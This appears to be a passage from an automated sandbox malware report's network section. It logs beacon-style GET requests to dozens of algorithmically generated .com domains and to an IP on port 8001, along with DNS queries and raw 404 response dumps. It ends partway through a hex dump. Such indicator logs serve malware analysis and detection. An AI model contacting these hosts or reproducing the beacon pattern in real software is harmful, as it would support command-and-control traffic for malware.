    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficDNS traffic detected: DNS query: gahyhob.com
    Source: global trafficDNS traffic detected: DNS query: lyvyxor.com
    Source: global trafficDNS traffic detected: DNS query: vocyruk.com
    Source: global trafficDNS traffic detected: DNS query: qegyhig.com
    Source: global trafficDNS traffic detected: DNS query: purycap.com
    Source: global trafficDNS traffic detected: DNS query: gacyryw.com
    Source: global trafficDNS traffic detected: DNS query: lygygin.com
    Source: global trafficDNS traffic detected: DNS query: gatyfus.com
    Source: global trafficDNS traffic detected: DNS query: vowycac.com
    Source: global trafficDNS traffic detected: DNS query: qetyfuv.com
    Source: global trafficDNS traffic detected: DNS query: vojyqem.com
    Source: global trafficDNS traffic detected: DNS query: puvyxil.com
    Source: global trafficDNS traffic detected: DNS query: gahyqah.com
    Source: global trafficDNS traffic detected: DNS query: lyryfyd.com
    Source: global trafficDNS traffic detected: DNS query: lysynur.com
    Source: global trafficDNS traffic detected: DNS query: qeqysag.com
    Source: global trafficDNS traffic detected: DNS query: qexylup.com
    Source: global trafficDNS traffic detected: DNS query: vonypom.com
    Source: global trafficDNS traffic detected: DNS query: gadyfuh.com
    Source: global trafficDNS traffic detected: DNS query: qexyryl.com
    Source: global trafficDNS traffic detected: DNS query: galykes.com
    Source: global trafficDNS traffic detected: DNS query: volykyc.com
    Source: global trafficDNS traffic detected: DNS query: qedynul.com
    Source: global trafficDNS traffic detected: DNS query: pumypog.com
    Source: global trafficDNS traffic detected: DNS query: gadyniw.com
    Source: global trafficDNS traffic detected: DNS query: lymysan.com
    Source: global trafficDNS traffic detected: DNS query: lyxylux.com
    Source: global trafficDNS traffic detected: DNS query: pufymoq.com
    Source: global trafficDNS traffic detected: DNS query: vofymik.com
    Source: global trafficDNS traffic detected: DNS query: gaqydeb.com
    Source: global trafficDNS traffic detected: DNS query: puvytuq.com
    Source: global trafficDNS traffic detected: DNS query: qetyvep.com
    Source: global trafficDNS traffic detected: DNS query: gatyvyz.com
    Source: global trafficDNS traffic detected: DNS query: pujyjav.com
    Source: global trafficDNS traffic detected: DNS query: qebytiq.com
    Source: global trafficDNS traffic detected: DNS query: vopybyt.com
    Source: global trafficDNS traffic detected: DNS query: lykyjad.com
    Source: global trafficDNS traffic detected: DNS query: lyvytuj.com
    Source: global trafficDNS traffic detected: DNS query: pupybul.com
    Source: global trafficDNS traffic detected: DNS query: lyryvex.com
    Source: global trafficDNS traffic detected: DNS query: qekykev.com
    Source: global trafficDNS traffic detected: DNS query: vojyjof.com
    Source: global trafficDNS traffic detected: DNS query: puzylyp.com
    Source: global trafficDNS traffic detected: DNS query: gaqycos.com
    Source: global trafficDNS traffic detected: DNS query: ganypih.com
    Source: global trafficDNS traffic detected: DNS query: qeqyxov.com
    Source: global trafficDNS traffic detected: DNS query: galyqaz.com
    Source: global trafficDNS traffic detected: DNS query: vonyzuf.com
    Source: global trafficDNS traffic detected: DNS query: pumyxiv.com
    Source: global trafficDNS traffic detected: DNS query: lysyfyj.com
    Source: global trafficDNS traffic detected: DNS query: lymyxid.com
    Source: global trafficDNS traffic detected: DNS query: puzywel.com
    Source: global trafficDNS traffic detected: DNS query: vofygum.com
    Source: global trafficDNS traffic detected: DNS query: lyxywer.com
    Source: global trafficDNS traffic detected: DNS query: pufygug.com
    Source: global trafficDNS traffic detected: DNS query: vocyzit.com
    Source: global trafficDNS traffic detected: DNS query: qedyfyq.com
    Source: global trafficDNS traffic detected: DNS query: qegyqaq.com
    Source: global trafficDNS traffic detected: DNS query: purydyv.com
    Source: global trafficDNS traffic detected: DNS query: lygymoj.com
    Source: global trafficDNS traffic detected: DNS query: vowydef.com
    Source: global trafficDNS traffic detected: DNS query: gacyzuz.com
    Source: global trafficDNS traffic detected: DNS query: qekyqop.com
    Source: global trafficDNS traffic detected: DNS query: volyqat.com
    Source: global trafficDNS traffic detected: DNS query: ww1.lysyfyj.com
    Source: global trafficDNS traffic detected: DNS query: lyryxij.com
    Source: global trafficDNS traffic detected: DNS query: qegyfyp.com
    Source: global trafficDNS traffic detected: DNS query: vocyqaf.com
    Source: global trafficDNS traffic detected: DNS query: puryxuq.com
    Source: global trafficDNS traffic detected: DNS query: gaqyzuw.com
    Source: global trafficDNS traffic detected: DNS query: pufydep.com
    Source: global trafficDNS traffic detected: DNS query: puvywav.com
    Source: global trafficDNS traffic detected: DNS query: qetyxiq.com
    Source: global trafficDNS traffic detected: DNS query: gacyqob.com
    Source: global trafficDNS traffic detected: DNS query: lygyfex.com
    Source: global trafficDNS traffic detected: DNS query: gaqypiz.com
    Source: global trafficDNS traffic detected: DNS query: qeqylyl.com
    Source: global trafficDNS traffic detected: DNS query: lysyvan.com
    Source: global trafficDNS traffic detected: DNS query: gacykeh.com
    Source: global trafficDNS traffic detected: DNS query: qegynuv.com
    Source: global trafficDNS traffic detected: DNS query: vonyryc.com
    Source: global trafficDNS traffic detected: DNS query: qexyqog.com
    Source: global trafficDNS traffic detected: DNS query: lyvylyn.com
    Source: global trafficDNS traffic detected: DNS query: qetysal.com
    Source: global trafficDNS traffic detected: DNS query: lymylyr.com
    Source: global trafficDNS traffic detected: DNS query: pujymip.com
    Source: global trafficDNS traffic detected: DNS query: vopycom.com
    Source: global trafficDNS traffic detected: DNS query: vocykem.com
    Source: global trafficDNS traffic detected: DNS query: purypol.com
    Source: global trafficDNS traffic detected: DNS query: lykymox.com
    Source: global trafficDNS traffic detected: DNS query: lyrysor.com
    Source: global trafficDNS traffic detected: DNS query: vowyzuk.com
    Source: global trafficDNS traffic detected: DNS query: lymytux.com
    Source: global trafficDNS traffic detected: DNS query: pumytup.com
    Source: global trafficDNS traffic detected: DNS query: lyxyjaj.com
    Source: global trafficDNS traffic detected: DNS query: gatydaw.com
    Source: global trafficDNS traffic detected: DNS query: lyxymin.com
    Source: global trafficDNS traffic detected: DNS query: pupydeq.com
    Source: global trafficDNS traffic detected: DNS query: gadydas.com
    Source: global trafficDNS traffic detected: DNS query: puvylyg.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:58:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93SruJii54aGJ3tSw%2F%2B4%2BmZDBr%2BiJZf3qVhxDobCgus%2Fou%2FJKuTnDSjN0AQRl%2FbzE34kN3Tn2DkcXSzJ%2BPqG79gHijB%2BQuA93KjA%2BOuXJdf6wWV8KunnqpMpUctJRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0d51ae511881-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:58:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp2kWtSqF%2Bo7hDgUGx0qZqD5g954kf%2BoZSLMj20kPejZYURwmaDNDjH%2BxAhyQSDovRGE7dcN3bwFOdjn%2BdXSgOdisNiSNTIpPMuDpcckxgymIrjHZGxWk4MDZNE%2BBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0d5b9d4143f9-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:59:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="42.4",amp_style_sanitizer;dur="21.0",amp_tag_and_attribute_sanitizer;dur="17.8",amp_optimizer;dur="7.3"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP29DjZxQIHlIhf0dMgASlOMmyAkTcyB9GOHriyvsBeehzRJFaESz6LmLY%2FVVTOPapE9KebJxAHE0kOxpxFKJyjy7Q5Y%2BZsCEIo1d%2B8CJ8v8LknzCir%2BKfK6u4ehtw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0e622d134370-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:59:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="61.2",amp_style_sanitizer;dur="27.2",amp_tag_and_attribute_sanitizer;dur="23.1",amp_optimizer;dur="8.5"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2xp2Lim%2F7gWUSjjI34R0T7KDe04gNt1BGkt21KYSyFIUP%2BKzR7uzm1DY08ixbVqhQm0HECsZoxlYj7VHPPPN93vcaQEQSXGX7Nr9UvnUTH%2FQCcNum6L%2FxXsN%2BQh9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0e6cbf60437a-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 07:00:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKMOtInikg0%2FmNHHQjSa49%2BaG%2B%2FWmcxlBrd%2FJK%2FqI3MUNWI4xIZAyqv5YWv%2F%2Bi8RZ9Wao8W%2FOqX682yXHh7lHwBL6c%2FTE2PmEaf98c3U9%2FcqO2xUfPVnSakNVM9trg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0f6ecafd19bf-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 07:00:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="48.1",amp_style_sanitizer;dur="23.8",amp_tag_and_attribute_sanitizer;dur="20.7",amp_optimizer;dur="8.0"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUraIUkIVKiNmoYlZk76JgBK02AKSk%2B6%2Fwdt5%2Btu5QDCOlNazCg9Lm2ohHB1sxmCYlJyaJhYwqki9dwzps7A6HhXAfNwUNdbtoImT4%2Ff%2BNovyW4XQQGZ5tGYrdxGUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0f9e9d880f98-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 07:00:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="21.1",amp_tag_and_attribute_sanitizer;dur="18.6",amp_optimizer;dur="5.9"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaujCRDVApxRtyGuqSoVE2Cno6mVxbWRnDQjHD6R8nsFDl9UMYPqIPMP7vbrYn%2BJCcl9DPbZpM1x4NaXTzG7gpK6Pmhi9UMUfa%2FfwBakrV%2FXXXteLlNgewzCPDlwhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0fac4fe80f83-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 06:58:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 08 Sep 2024 06:58:44 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 06:58:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 